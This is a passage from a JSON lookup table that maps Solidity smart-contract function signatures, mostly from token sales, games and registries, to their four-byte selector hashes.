"0x7678f8bb", "acceptBid(int256,int256,int256,int256)": "0x184d1a77", "withdrawBid(int256,int256,int256)": "0xe08ed5f9", "registerBid(int256,int256,int256)": "0x16958c79", "getRequest(int256)": "0xf72755fe", "withdrawRequest(int256,int256)": "0xbf1b5f19", "registerRequest(int256,int256)": "0x84610618", "Credentials(bytes32,bool)": "0x5e89d92a", "testReentracyGuard()": "0x329d1a35", "addContractTestToBounty(address,address)": "0xa339c21a", "clearUnusedDeposit(uint256,uint256)": "0x98bf043d", "endBounty(address)": "0x2f34c645", "assertValidChallenger(address)": "0xa21eea2a", "getPendingWithdrawl()": "0x56c686b1", "releaseUnclaimedBounty(address)": "0xd4214d1b", "assertInvalidState(address)": "0x7e602078", "challengeContract(address,address,address)": "0x2d3d403a", "initiateChallenge(address)": "0x8cccc341", "registerBounty(address,uint256)": "0x100f7a79", "BountyManager(address)": "0xce4e42d2", "test_oneValidEqStringUint(int256)": "0x0e0701be", "multiplex_remove(address)": "0x7d5dec2a", "multiplex_add(address)": "0x4ceab858", "multiplex_target(address)": "0x6925ad77", "Multiplexer(address,address[])": "0x4357e289", "get_enode_by_row(uint256)": "0xd1a69455", "sender_enode()": "0xd82beb9e", "add_entity(string)": "0x710f3953", "BlackSwan()": "0xb14ecf18", "update_entity(address,string)": "0x084bbafb", "new_entity(address,string)": "0x927db81f", "get_entity_count()": "0x0c646fbd", "determineOutcome(uint256,uint256,uint256,bool)": "0xedc74092", "verifySeed(bytes32,bytes32)": "0x8e0c36c4", "DTCC_ILOW_7()": "0xf6a0e8a4", "mintSBIToken(address,uint256)": "0xc5d81804", "pos(address[],uint256)": "0xe992f6cd", "AddSupply(uint256)": "0x1f90ffc8", "ETimesChain()": "0x5ff63abc", "XYCC()": "0xe6955d7c", "IouRootsPresaleToken(string,string,uint8)": "0x6e95a066", "MLIOU()": "0xccd9d08f", "Wixlar()": "0x955d4d16", "AgesToken()": "0x51656f08", "PCF()": "0x6bbf54a4", "MMMbCoinCrowdsale(uint256,uint256,uint256,address,address,address,address)": "0x340fef94", "MMMbCoin(uint256)": "0x403a734a", "QuantumXICO()": "0xffd4185c", "GoldRex()": "0x6bdc1d2a", "modifyTokenPrice(uint256,uint256)": "0xb59b0fc4", "changeElementName(uint256,string)": "0xf641d753", "changeScientistForElement(uint256,uint256)": "0x0cf59cc6", "changeStepPricesLimits(uint256,uint256,uint256)": "0x5bdb9ddf", "changeStartingPricesLimits(uint256,uint256,uint256)": "0xbda6642c", "getTotalSpecials()": "0x1bbe1813", "getTotalScientists()": "0x7fbd778a", "getTotalElements()": "0x7aa63a86", "checkPeriodic()": "0xdf7c5fca", "createContractSpecial(string)": "0x016deccc", "createContractScientist(string)": "0x39ffb234", "createContractElement(string,uint256)": "0x7af2a28e", "createContractPeriodicTable(string)": "0xe722a522", "_createElement(uint256,string,address,uint256,uint256)": "0xd1d3a898", "Elements()": "0xeee0d9e2", "TIXGeneration(address,address,address,address,address,uint256,uint256)": "0x227f592c", "BRI()": "0x3207b544", "executeSelfdestruct()": "0x89c2443e", "GFC(uint256,string,string,uint8,address)": "0x36de44e0", "transferAdviser(address[],uint256[])": "0x828363b4", "addWhitelistMember(address[],uint256[])": "0xbf7ea21c", "doAirdrop(address[],uint256[])": "0xc0116c3c", "withdrawTeam()": "0xbb51f32d", "purchaseWithBTC(address,uint256,uint256)": "0x7a34cedb", "purchaseWithPromoter(address,address)": "0x89ef75b1", "purchaseWithETH(address)": "0x23fe1da1", "cashBack(address)": "0x97fc93ab", "withdrawPromoter()": "0xd02b97aa", "_teamTransfer(address,uint256)": "0xb8716f3a", "_freezeTransfer(address,uint256)": "0x72e4030d", "addInvestorBonusInTokens(address,uint256)": "0xd340ab41", "addInvestorBonusInPercent(address,uint8)": "0xb9b7238b", "_sellCrowd(uint256,address)": "0xcbf346cc", "_sellPresale(uint256)": "0x1fd01085", "setMaxRate(uint256,uint256)": "0x71d8d7af", "setBTCRate(uint256)": "0x0d16b6ca", "setETHRate(uint256)": "0x4bfe2779", "prolongCrowdsale()": "0xaa36aae8", "checkICOStatus()": "0xe9a765eb", "ICOStatus()": "0xb4590cbe", "kycPassed(address,address)": "0xe308262a", "assignTeamTokens()": "0x907c5082", "assignPreicoTokens()": "0x4ecc7f59", "setDirector(address)": "0x26ba4319", "WithdrawMonethaBuyerUtility()": "0x0f21a046", "KentraToken(uint256,uint256)": "0xe69fde41", "addPigment(uint256,uint256,uint256,uint256)": "0xac2aefd2", "processReinvest(uint256,uint256,uint256)": "0x36c7d4bd", "reinvest_color(uint256,uint256,uint256)": "0xe973f2c4", "rescueCatHashCheck(bytes32)": "0x599312ec", "calculateGrantClaim(address)": "0xfd75b8d4", "claimVestedTokens()": "0xe74f3fbb", "removeTokenGrant(address)": "0x3023641d", "addTokenGrant(address,uint256,uint128,uint16,uint16)": "0xda09118e", "setMinTokensRequiredForMessage(uint256)": "0x33287446", "sendFundsTo(address,uint256)": "0x0cd1812f", "LuxToken()": "0x56e27ce6", "processBuyAmount(uint256)": "0x507afbec", "Payout_intern(uint256)": "0x036723a2", "RobinHood()": "0x30bdf202", "CPSToken()": "0xeeca6afd", "requestWithdraw(uint256)": "0x745400c9", "setIcoEnd(uint256)": "0x23e7a900", "setTransactionFee(uint256)": "0x096a8ab7", "requestOfTime(address,uint256)": "0x9f569ab4", "requestOfAmount(address,uint256)": "0x03078416", "getLinglongCat(uint256)": "0x7df02c0e", "LinglongCatCore()": "0x7049cd98", "createDefaultLinglongCat(uint256,uint256,uint256,address,uint256,uint256)": "0xad81d6f3", "createDefaultGen0LinglongCat(uint256,address,uint256,uint256)": "0x636b2ac3", "_createLinglongCatWithTime(uint256,uint256,uint256,uint256,address,uint256,uint256)": "0xd10da303", "_createLinglongCat(uint256,uint256,uint256,uint256,address)": "0x576d4e13", "getMyCat()": "0xa87e8aad", "getFreeCat()": "0xfc337f5a", "CatFarmer()": "0xfb070d0d", "OurBank(address,address)": "0x1b397d79", "seventeen()": "0x8ee6540c", "two_card()": "0x9f5c11c4", "one_card()": "0x31e5f055", "spiritual_guidance()": "0xec7b9655", "past_present_future()": "0x97b9d025", "celtic_cross()": "0xd789479d", "career_path()": "0x6dc56397", "getEscrowBalance()": "0xc56e610e", "drawDown(uint256)": "0x038f5ed6", "disburse(uint256)": "0xbd77ac2c", "updateAccount(address)": "0x2ce3d440", "paymentsOwed(address)": "0xb8eddde1", "dividendsOwing(address)": "0x8391e45c", "redeemFromEscrow(uint64)": "0xa828f441", "clientClaim(address,uint64)": "0x583d175f", "insureClient(address,uint64)": "0xf1eeec2e", "getInsuranceDataByID(uint64)": "0x4f1a7678", "getInsuranceIDsByClient(address)": "0xaaeb3255", "getOracles()": "0x40884c52", "getInsuranceContracts()": "0xe33e59d8", "Syndicate(uint256)": "0x7367df4b", "createQuote(uint256,bytes32,bytes32)": "0x34256ab2", "MacBookOracle()": "0xfc03fb11", "getDynamicElementAt(uint256)": "0x2f3ff501", "addNumberToDynamicBytes(uint256)": "0xeb8266b5", "getStaticElementAt(uint256)": "0xb69e9b1d", "getStaticArraySize()": "0x9ef53400", "getFirstAndSecondItem()": "0x2aac8ad4", "getCharAt(uint256)": "0x544743d6", "SpecialArrays()": "0xb2dae885", "_indexProofId(string)": "0xc3c132b2", "_indexAccount(address)": "0x4e5ed65b", "lockOpen()": "0xbca1f81c", "lockContractOwner()": "0x1b949f85", "lockMaxSupply()": "0xfca76c26", "issue(address,uint256,string)": "0xebf469dc", "DynamicToken()": "0xd1051a68", "emitPublicCapabilityRemoved(address,bytes4)": "0x588cff4c", "emitPublicCapabilityAdded(address,bytes4)": "0x9a75aa06", "emitCapabilityRemoved(address,bytes4,uint8)": "0x0a7a2fef", "emitCapabilityAdded(address,bytes4,uint8)": "0xd0d9e21d", "emitRoleRemoved(address,uint8)": "0x00a81ef6", "emitRoleAdded(address,uint8)": "0x95725d8a", "_emitPublicCapabilityRemoved(address,bytes4)": "0xd4ea7b08", "_emitPublicCapabilityAdded(address,bytes4)": "0x6f947d6d", "_emitCapabilityRemoved(address,bytes4,uint8)": "0x38ee95ab", "_emitCapabilityAdded(address,bytes4,uint8)": "0xd5767fb6", "_emitRoleRemoved(address,uint8)": "0xbd52d81a", "_emitRoleAdded(address,uint8)": "0x2e87f4a5", "_shift(uint8)": "0x59ac5c6d", "hasUserRole(address,uint8)": "0xa078f737", "isCapabilityPublic(address,bytes4)": "0x2f47571f", "isUserRoot(address)": "0xfbf80773", "_setRoleCapability(uint8,address,bytes4,bool)": "0xb24a5425", "removeRoleCapability(uint8,address,bytes4)": "0x9ae0140c", "addRoleCapability(uint8,address,bytes4)": "0x7977f708", "setPublicCapability(address,bytes4,bool)": "0xc6b0263e", "_setUserRole(address,uint8,bool)": "0x92844ddd", "removeUserRole(address,uint8)": "0xb44f794f", "setRootUser(address,bool)": "0xd381ba7c", "bitNot(bytes32)": "0xecdb065b", "getCapabilityRoles(address,bytes4)": "0x27538e90", "getUserRoles(address)": "0x06a36aee", "forfietCollat()": "0x45a3816c", "initLending(address,uint256,uint256)": "0xf4c38aa1", "CollatLending()": "0x5ed18d95", "releaseFundsBuyer()": "0x318dbcae", "releaseFundsSeller()": "0xdece2e67", "Transaction(bytes32,bytes32,address,bytes,bytes32,bytes32,address,bytes,bytes32,uint256,uint256,bytes)": "0x5dec7d49", "BancorQuickConverter()": "0x23fe073e", "getAddr(bytes32)": "0x4ccee9b6", "_pointToResolverAndResolve(int256,bytes32,address)": "0xe4bff515", "_createName(bytes32,address)": "0x451e3ec5", "pointRootNode(int256,address)": "0x545c50f0", "deleteName(bytes32)": "0xdc371e54", "createNameAndPoint(int256,bytes32,address)": "0xb8f78178", "createName(bytes32,address)": "0x6b62cb1b", "getOwnersLength()": "0x57b543e2", "checkPoint(int256,uint8,int256,uint16)": "0x52c53cb7", "addCar(address,uint8,uint16)": "0xd10db2e1", "getSum(uint16)": "0x87be727b", "getType(uint16)": "0x4415516b", "getAdres(uint16)": "0x2ff76163", "getBalance(uint16)": "0x415016f4", "main(uint16,uint8,int256)": "0xb9883b3f", "resetFine(uint16)": "0x019fef03", "setFine(uint16)": "0x6a08b403", "CCProject()": "0x1e1c86b7", "getUserName(uint256)": "0x988da80f", "getBorrowedBooksCount(uint256)": "0x5fba26a6", "getBookForUser(uint256)": "0xf532e888", "listContractByModuleName(string,string)": "0x3c5524d8", "listContractByModuleId(string)": "0xcde180a9", "getModuleCount()": "0x57d56267", "listContractByModTextAndCttName(string,string,uint256,uint256)": "0x58e039bd", "findContractByModText(string)": "0x095bbe59", "findContractByModName(string,string)": "0x8764159e", "findByName(string)": "0x4d9a3136", "findByModuleText(string)": "0x1c5eaa23", "qryModuleDetail(string,string)": "0x394cd121", "qryModuleDetail(string)": "0x5fef2094", "qryModules()": "0x54a8b217", "setConntractEnable(string,uint256)": "0x9776415f", "setModuleEnable(string,uint256)": "0xf38afbf7", "delModule(string)": "0x3c329dc4", "addAuthorizeRole(string,string,string)": "0xfed4de76", "deleteOpenAction(string,string,string,string,string)": "0x6e79ae56", "lastBlock_v12()": "0x96e9f6f2", "extractablePercentage()": "0xd476758f", "auctionManager()": "0xb0192f9a", "project_contract()": "0x9a221876", "FetchlastHacker()": "0xd131a803", "ROLE_BACKEND()": "0x2e0025c1", "tokenContributionMin()": "0x7ddaa56a", "RANGEEND_8()": "0x62676d78", "rejectHours()": "0x7f3c26b1", "forceOff()": "0x126f992c", "FEE_ADDRESS()": "0xeb1edd61", "numGamesTimedOut()": "0x80943252", "marketToken2018()": "0xba976ae5", "addressFounders2()": "0xf2d906cc", "MINER_CREATION_LIMIT()": "0x9a49eab5", "usdToEthPrice()": "0xba34251b", "totalTimeRange()": "0x59ac70ae", "tickets1kprice()": "0xdbad21af", "getTotalLevelValue()": "0xe5789f5f", "endIcoDate()": "0xa1210a69", "ETH_SIGN_PREFIX()": "0x7cb6cf3e", "auction_start_time()": "0x0eaaf5ac", "numberInRaffle()": "0xa8762854", "currentCount()": "0xc732d201", "totalInitialSupply()": "0x9fd4da40", "AREFWallet()": "0x1de95d74", "maxWithoutWhitelist()": "0xecc9665b", "secondPrivateReleaseTime()": "0xe3a87f8b", "ADDR_BOUNTY_TOKENS_ACCOUNT()": "0x285f6a55", "consultantsKey()": "0x12287629", "auctionPaused()": "0x6520fde5", "EURValue()": "0xc12edde6", "extraSupply()": "0xad35bdb0", "NTFoundationAddr_()": "0x63c194f1", "dateSoftCapWasReached()": "0x9b8f7113", "isActivityCore()": "0x91e50314", "vestSupply()": "0x192b663d", "PERSONAL_CAP()": "0xd9946a79", "date01Feb2019()": "0x4539bf18", "reservedAddr()": "0x50ae85d8", "stage3BeginTime()": "0x8b223943", "vestingStageTime()": "0x8f5cf7b9", "isFundedMini()": "0xa4de64c4", "getContractDataSK()": "0x62935a98", "roundNumber_()": "0xf77d62f0", "DOW_SAT()": "0xc7edf88c", "MOTDiscount()": "0x0d0c2c62", "dateEnd()": "0x89244e2a", "projectCompleted()": "0xc6221878", "teamTokensGenerated()": "0x8d3bd1f8", "mainSaleSuccessfull()": "0x69986073", "CoinVillaIssued()": "0x40a203c4", "reservedAddress()": "0x666f6843", "TOKEN_RATE_25_PERCENT_BONUS()": "0x67a6ae62", "overflow_lower()": "0xb7b3a56e", "address1()": "0x3a36399e", "DAY()": "0x27cfe856", "BitcoinRed()": "0x83499fdf", "projectCreator()": "0xa541a2a2", "shp()": "0x81d92ed4", "founder4()": "0x80a2ddad", "RATE_PUBLIC_SALE()": "0xe2c3f9a8", "bonusFirstTwoDaysPeriod()": "0x434a55eb", "validator()": "0x3a5381b5", "saleOngoing()": "0x39d08c2a", "cancelOwnershipOffer()": "0x1eb96a5c", "token_callg()": "0x92573a0c", "firstStageMinted()": "0x842c17be", "percentToTakeAsSeed()": "0x5efdb1e4", "Deposit_referral()": "0xb9fb7b8c", "publiclyDistributedParts()": "0xa24f1e82", "creditcoinLimitInFrac()": "0xd1479575", "ethersCollecteds()": "0xcc7a060f", "expirationSeconds()": "0xe05d769e", "resultsValidationStep()": "0x15d44202", "eventEnded()": "0xf57e63e2", "icoContract()": "0xc66e4095", "Total_Entries()": "0xc54a0980", "compatible223ex()": "0x72054df4", "feesWithdrawn()": "0xf240d0f5", "icsToken()": "0xe87752f4", "lockPeriod()": "0x3fd8b02f", "RESERVED_FOR_TEAM()": "0x7f704657", "resetQuote()": "0x69ddaad1", "nxtAddr()": "0xdf885536", "freezeAdmin()": "0xa331939d", "chfRate()": "0x55bfe5b1", "MAX_OWNER_PERS_SITE()": "0x6e575537", "startTimeStage2()": "0xc3b7e378", "moonIncContract()": "0x4abb525a", "bancorDaiSmartTokenRelay()": "0xa76f43a0", "Currenttask()": "0xf05764a0", "TADPOLE_BASE_REQ()": "0x2fc8c39d", "destTokensEarlyInvestors()": "0x57f011b6", "END()": "0xefe7a504", "totalEthInWeiForPreIco()": "0x3cb8cfcd", "disbursementAmount()": "0xf28b7a9c", "zgetOtherContract()": "0x528b5176", "invokeOnce()": "0x940dbf3e", "consultantsAllocation()": "0xce8b7be4", "getDeedIds()": "0xfcc4a54c", "getPendingPaymentAmount(address)": "0xa283fd00", "FactbarDeed()": "0xd9a6c6db", "removeDeed(address,uint256)": "0xdf3a635a", "addDeed(address,uint256)": "0x86af6ba5", "deedsOf(address)": "0x26d3df61", "deedName(uint256)": "0x17c35e88", "StopperCoin()": "0xc0c76940", "BayernvsRealMadrid()": "0x07542576", "ULTRONEUM()": "0xcb294dc5", "Atriark(uint256,string,uint8,string)": "0x2083250d", "APS(string,string,uint256)": "0x5427e4e1", "CorruptionCoin()": "0xb8366bd1", "EtherAsset()": "0x0a8c1551", "_0xZibitToken()": "0x670f8755", "Fricacoin()": "0x8f83743f", "EROSCOIN()": "0xa1f36a78", "asciiToUint(bytes1)": "0x92cd2b99", "uintToAscii(uint256)": "0x4a7c7e46", "same(string,string)": "0x6df1667c", "transferInitialTokens()": "0x2d2925c7", "COTToken()": "0xc2e62675", "Rivercoin()": "0xc2695a25", "DinosaurFarmerNew()": "0xbda2e692", "showBalance()": "0x81b2d07b", "getMaxMerge()": "0x0253a95a", "getAllCellInfo()": "0x3cf3d6d8", "startingPriceOf()": "0xd5cc8813", "getAllCellIds()": "0xa8826602", "cellsOf(address)": "0x6b45adf3", "MergeStatus()": "0xb10d539b", "buyNew(uint256,uint256,uint256)": "0x5cee9ea7", "buyOld(uint256)": "0x0cb743a5", "getUserNameOf(address)": "0xe69852d0", "getUserName()": "0x12958f1c", "setUserName(string)": "0x2b5914fe", "parseId(uint256)": "0x5863115e", "generateId(uint256,uint256,uint256)": "0x323a73d9", "checkIsOnSale(uint256)": "0xd3f71ecc", "requestMerge(uint256[])": "0xab99e48f", "setMaxMerge(uint8)": "0xfb7cb850", "setReserved(uint8,uint8)": "0x76897b90", "enableMerge(bool)": "0x24d30d54", "CellTokens()": "0x8d134175", "remainTokens()": "0xce0befcf", "transferDelegation(address)": "0x7babfffc", "CoinMeet()": "0xf091e5a2", "voteSvp03(bool)": "0xf0ecadcc", "VoteSvp002(address,uint256,uint256)": "0xf4916f05", "EightteenToken()": "0xf80f5d4a", "InfluToken()": "0x62ee37aa", "PGPToken()": "0xbd45115c", "MyJioCoin()": "0x36a128c2", "buyListing(bytes32,uint256)": "0xb9247673", "cancelListing(bytes32)": "0x9299e552", "createListing(address,uint256,uint256,uint256,uint256)": "0x9057f289", "getHashInternal(address,uint256,uint256,uint256,uint256)": "0x48d34bc6", "getHash(address,uint256,uint256,uint256,uint256)": "0x86964032", "updateOwnerPercentage(uint256)": "0x3a5e2576", "PowerofBubble()": "0x74d3475c", "SunriseCoin()": "0x125f67e7", "_convertToWei(uint256)": "0x134fd7d0", "setCoinStorage(address,address)": "0x3dd02f06", "GCCExchangeCore()": "0x872bc83a", "operate(bytes)": "0x7b575b33", "setCoinContract(address,address)": "0xb11a1b89", "depositBalance()": "0x61bc1a49", "AmericanAirlinesCoin()": "0x5498e9e5", "EthermiumAffiliates(address)": "0xacbb471f", "updateTargetToken(address,uint16,uint16)": "0x9ee29ef2", "projectFailed(uint16)": "0xddeed1a4", "increaseCap(int256)": "0x1f72d7d8", "unPauseBuy()": "0x3b4a00b4", "pauseBuy()": "0xa38eb622", "canExchangeNum()": "0x230d3469", "saleRatio()": "0xcaded61f", "balanceOfTarget(address)": "0x37dc414b", "balanceOfFrozen(address)": "0xa6dc84f0", "updateFrozenToken(address)": "0x2fb2f3dd", "TokenImpl(string,string,uint256)": "0x3f59b1ab", "QTLToken(address)": "0xa05a70a7", "TEC(uint256,string,string)": "0xfdb7d435", "ArtTokenBurn()": "0xbcfe8fb4", "_computeCut(uint256,uint256)": "0x6e3e82f9", "_applyShare(address,address,uint256)": "0x2338c002", "_initCardDetails(uint8,uint256)": "0x233b39c9", "_fillCardStruct(uint8,address,string,string,string)": "0x8a9b2b36", "setNSFW(uint8,bool)": "0xe6591f4e", "computeInitialPrice(uint8)": "0xa7f58c24", "transferCardOwnership(address,uint8)": "0xbc2fe07b", "getCardLeaseLength(uint8)": "0x79081feb", "getLease(uint8,uint256)": "0x8f6f3275", "getLastLease(uint8)": "0xf0d8e968", "leaseCard(uint8,string,string,string)": "0x8df793d6", "cancelLeaseOffer(uint8)": "0x44fd584d", "setLeaseCard(uint8,uint256,uint256)": "0x7db33f99", "cancelSellCard(uint8)": "0xec591b20", "sellCard(uint8,uint256)": "0x2cefc429", "editCard(uint8,string,string,string)": "0x8014f238", "buyCard(uint8,string,string,string)": "0xc02d0140", "endICO()": "0x4f248409", "updateEthICOThresholds(uint256,uint256,uint256,uint256)": "0x7fe98ae0", "HeroCoin(address,address,address,address)": "0xed156449", "subBuy(bytes32,bytes32,address)": "0xdf5d3e89", "checkSubPrice(bytes32)": "0xa85165e0", "checkSubAvailability(bytes32)": "0xdf10dd6e", "subRegistrationPeriod(bytes32)": "0x935600ce", "nodeCheck(bytes32)": "0x9f45c8ec", "unlistSubName(bytes32)": "0xd7f08eed", "listSubName(bytes32,uint256,uint256)": "0xaf7885b5", "subSale()": "0xc69493a0", "mintMAYToken(address,uint256)": "0x16b60f2c", "MAYTotalSupply()": "0x04b8ca98", "crowdsaleOpen(bool)": "0xc1a12d66", "setMAYExchangeRate(uint256)": "0x4a40e85b", "MayanProtocolContract(uint256,uint256)": "0x8549d6f4", "createRefundPoll()": "0x40e6b00a", "checkRefundPollDate()": "0xe8df0ca1", "createTapPoll(uint8)": "0x026eca12", "updateMinVotedTokens(uint256)": "0xc4e12e1d", "PollManagedFund(address,address,address,address,address,address,address,address[])": "0x3dcb0b81", "getVotedTokensPerc()": "0x2c24909c", "TapPoll(uint256,address,address,uint256,uint256,uint256)": "0x99db7eb7", "RefundPoll(address,address,uint256,uint256,uint256,bool)": "0x304d95a6", "onPollFinish(bool)": "0xb3b5ec33", "isSubjectApproved()": "0x5299ccc6", "isNowApproved()": "0x80322cbd", "tryToFinalize()": "0x36181026", "onTokenTransfer(address,uint256)": "0xc734f917", "revokeVote()": "0x43c14b22", "BasePoll(address,address,uint256,uint256,bool)": "0x44c3cc68", "onRefundPollFinish(bool)": "0x89ea2cb7", "onTapPollFinish(bool,uint256)": "0x29c90b63", "refundTokenHolder()": "0xfbbfe830", "enableRefund()": "0x89e42346", "firstWithdraw()": "0xe9b5a2f7", "calcTapAmount()": "0x23773f81", "getCurrentTapAmount()": "0x774a97cf", "decTap(uint256)": "0x36e61cf7", "refundCrowdsaleContributor()": "0xff01ffa8", "Fund(address,address,address,address,address,address,address,address[])": "0x1c87055f", "finishIssuance()": "0xc422293b", "hasListener()": "0x5438c5d2", "setListener(address)": "0xadcd905b", "ManagedToken(address,address[])": "0x79216aec", "_setOwners(address[])": "0x391ecc2c", "setOwners(address[])": "0xfa4d3698", "enableCrowdsaleRefund()": "0x3b64e77e", "TTNCoin(uint256)": "0x2dcac811", "getCap()": "0x554d578d", "finalizeNOK()": "0x7cf37493", "preallocate()": "0x3a000f23", "buyImplementation(address,uint64,uint256,uint8,bytes32,bytes32)": "0x59317ea2", "buyTokens(uint64,uint256,uint8,bytes32,bytes32)": "0xdee4b246", "buyTokensFor(address,uint64,uint256,uint8,bytes32,bytes32)": "0xae457835", "senderAllowedFor(address)": "0x9edfb647", "releaseTokensTo(address)": "0xd0fe3e85", "totalTokens()": "0x7e1c0c09", "arraySum(uint256[])": "0x7c2b11cd", "batchTransferSame(address[],uint256)": "0x3f27f105", "batchTransferDiff(address[],uint256[])": "0x63937651", "enableTokenBurn()": "0x993bcc63", "enableTokenTransfers()": "0x1788de80", "setICO(address)": "0xb6f50c29", "Reservation2(address,uint256)": "0x0ebf5f27", "MRBLToken()": "0x275be02c", "reduceLockingTime(uint256)": "0xb288d748", "noteTokens(address,uint256)": "0xb7381a2c", "AliciaToken(string,string,uint8,uint256)": "0x9b26bae3", "getCurrentTrancheIdx(uint256)": "0x9fd7ca8a", "setMaximumPurchaseFraction(uint256)": "0x683799e6", "setTrancheMinTx(uint256)": "0x5eb51d3c", "setManagement(address,address,bool)": "0x0d7dc36a", "setKycWhitelist(address,address,bool)": "0x50b91881", "getCurrentTrancheVolume(uint256)": "0x306c4ebe", "isRedeemed(uint256)": "0x32d33cd0", "preSaleInit()": "0xa7c19841", "claimRefund(address)": "0xbffa55d5", "createReferralGiveAways(uint256,uint256,address)": "0x87b234ec", "removeFromApprovedAddress(address)": "0x30a7351c", "addToApprovedAddress(address)": "0xb86dab46", "CSCPreSaleManager()": "0xc34db131", "getCollectiblePrice(uint256,uint256)": "0x6a537e40", "getCollectibleTypeBalance(address,uint256,uint256)": "0xf5df1d10", "_bid(uint256,uint256,uint256,uint256,address)": "0xe3a135b9", "_isActive(uint256)": "0x0bed63c7", "getVoucherDetails(uint256,uint256)": "0x2a22196d", "getShipDetails(uint256,uint256)": "0x111723ed", "_getCollectibleDetails(uint256)": "0x2bd152f0", "_createCollectible(bytes32,uint256,uint256)": "0x980b05e0", "getCollectibleDetails(uint256)": "0x70994b31", "noError()": "0x8a53f230", "hasError()": "0xad5e46cb", "setBanker(address)": "0xf1ff732b", "setSecondaryGameManager(address)": "0x80373436", "setPrimaryGameManager(address)": "0xb5a54627", "transferSig(bytes32,uint256,address)": "0xf37bdaac", "payTxFees(bytes32,uint256)": "0x4657ad8e", "paySellerFee(bytes32,address,uint256)": "0x273f1de7", "computeTxFee(uint256)": "0xc2eaaeb3", "john()": "0xb129497c", "DMPhuongToken()": "0x19ce4432", "changeOwnerOfMonethaUserClaimStorage(address)": "0x49ca7656", "deleteAccountsInBulk(address[])": "0xeadb6fa9", "deleteAccount(address)": "0x4c1b64cb", "claimTokensInBulk(address[],uint256[])": "0x12bcc858", "IPv6Token()": "0x3d2e7538", "setDefaultTokenURI(string)": "0xa125c824", "setCostOfToken(uint256)": "0xa7dbfcaa", "_mint(bytes32,uint256,bytes32,address)": "0x59e99db2", "buyTokens(bytes32)": "0xea7000d6", "buyToken(bytes32)": "0xdffd5e57", "mintTransfer(bytes32,uint256,bytes32,address)": "0x699ac46f", "InterfaceToken()": "0x2635f59f", "roomsAvailable(string,uint256[])": "0x0c45e8d7", "roomAvailable(string,uint256[],uint256)": "0xaf6fae22", "totalRooms(string)": "0xf221fda0", "bookWithLif(uint256,uint256,bytes,string,uint256[],bytes32)": "0x31d4ac45", "bookWithEth(uint256,uint256,bytes,string,uint256[],bytes32)": "0x5277fda5", "changeBooking(string,uint256[],uint256,address,bytes32)": "0xd44a2863", "bookRoom(string,uint256[],uint256,address,bytes32)": "0x0e0280d0", "addRooms(string,uint256)": "0xdab8ef38", "edit(address,address)": "0x847778ad", "BookingPoC(address,address,uint256)": "0xe0e58009", "getWin(uint64)": "0xc968ac68", "getServiceStatByAddr(uint64,address)": "0xad5bfcb5", "getServiceStat(uint64)": "0x8ad9a976", "buyServiceByAdmin(uint64,uint64,address)": "0x9098f074", "buyService(uint64,uint64)": "0xdf463ed3", "configOf(uint64)": "0x6bf91c63", "setConfig(uint64,string,uint256,uint256,address,string)": "0x4dea4d15", "MintCoin()": "0xe27131f9", "PandoraToken(uint256,string,string)": "0x787089bd", "CimbomCoin()": "0x194eb01c", "YFTToken(uint256,string,string)": "0x819cfdf1", "ProofOfDiligenceToken()": "0x2c327538", "GameCellCoin(uint256,string,uint8,string)": "0xa0a7e0f8", "randomWithNonce(uint256)": "0xbf0e4900", "finishADrop()": "0x1b61f340", "Giveafuck()": "0xe3d1072c", "plantcToken()": "0x96a625a5", "RhodoToken(address)": "0xc42f61d3", "TheTokenB()": "0x5013bb79", "KabirTestToken2()": "0x76a133ca", "CyTestCoin(uint256,string,uint8,string)": "0xcb6bfd23", "AkikToken()": "0x193c8da4", "CruzeiroToken()": "0xeff867e5", "MizeCoin()": "0xdb1eeb51", "getEtherPrice()": "0xca7c4dba", "getToBalance()": "0x895693a9", "transferEther()": "0xc9b25f0f", "QLANCEGO()": "0x61bec4fd", "DDD()": "0xdd96440e", "XavierToken()": "0xb549bdda", "WinToken()": "0x48e25bd2", "set_totalSupply(uint256)": "0x9a31b14e", "TDTToken()": "0x6ddd707f", "LINDOToken()": "0x69111865", "YaoMaoCoin(uint256,string,uint8,string)": "0x21592a2b", "compare(address,address)": "0xbeb5f658", "change_address(uint256,address,address)": "0x2fe9e1a9", "add_address(address,address)": "0x595a69e8", "Ledger(address)": "0x7f8b8f48", "testHashing(address,uint256,address,uint256,uint256,uint8,bytes32,bytes32,bytes32)": "0xa34c6716", "newInversor(address,address)": "0xfd475875", "paySmartContract(bytes32,address[],uint256[])": "0x45f8567c", "getFlavor()": "0xfc442ec3", "newCookie()": "0xc3d38586", "paySmartContract(bytes32,address[],uint256[],bytes32)": "0xb6ad57d6", "setCrowdsaleMinter(address)": "0xfcb3a3a3", "uv()": "0xd526c08e", "LineToken()": "0xfb25b62c", "refundToOwner(address)": "0x2c9f092f", "Kubera()": "0x335d43a3", "Assert(bool)": "0x27de2765", "DreamTeam()": "0xe44c333a", "TheTokenC()": "0xaa833a25", "SergeToken()": "0x7d94d4aa", "CrowdSaleTest()": "0xd1cec3ac", "YAP()": "0xd2bd3dd9", "Exchange(address,address,address,address,bytes32,uint256,address)": "0xfe675deb", "addLocationRecord(uint256,uint256,string,string)": "0x7394cb3f", "addItem(uint256,string)": "0xbe572d52", "getNine(uint256)": "0xde750f6f", "Nines()": "0xbd62fff3", "LCASH()": "0x32307c67", "ParaD2Test()": "0xcdefa4de", "claimTokensERC777(address,address,address,uint256,uint256,bytes,uint8,bytes32,bytes32)": "0x67845daf", "claimTokensERC20(address,address,address,uint256,uint256,uint8,bytes32,bytes32)": "0x9138f38b", "validateAndRegisterClaim(address,bytes32,uint8,bytes32,bytes32)": "0xe431d241", "roundUp(uint256,uint256)": "0x03ce6c55", "KTZ()": "0x5fc42ebf", "setParameters(address,string,string,string,address,uint256,uint256)": "0xc483befa", "MyWill()": "0x79c5c6b6", "SmithToken()": "0x92890b09", "setXzlkcjqowhoqhwoihsiaoquweizxoiuo(uint256)": "0x9c7912ff", "Thief()": "0x1ee17afd", "ACCC()": "0x3ff66381", "createEmptyTrack(uint256)": "0x81cb79ca", "getStats(bytes32)": "0x0bb700dc", "prometheusShipMinted()": "0xcb12be81", "ownerContract()": "0x7f74ac15", "priceStep1()": "0x1b26fa6a", "MAXWIN_inTHOUSANDTHPERCENTS()": "0x06784b81", "holdAddress1()": "0x268ef7e8", "alloweRefund()": "0x5f01b42f", "frtToken()": "0x8261eb1b", "referBenefitRate()": "0x5481c1ff", "WALLET_T8EX_RESERVED()": "0xdb7fea95", "iBlock()": "0x92d25259", "mintToFounders()": "0xeac48278", "initEachPUST()": "0x1b1b6069", "lockAfterManuallyMint()": "0xc1aa721d", "_unmintedTokens()": "0x866c03eb", 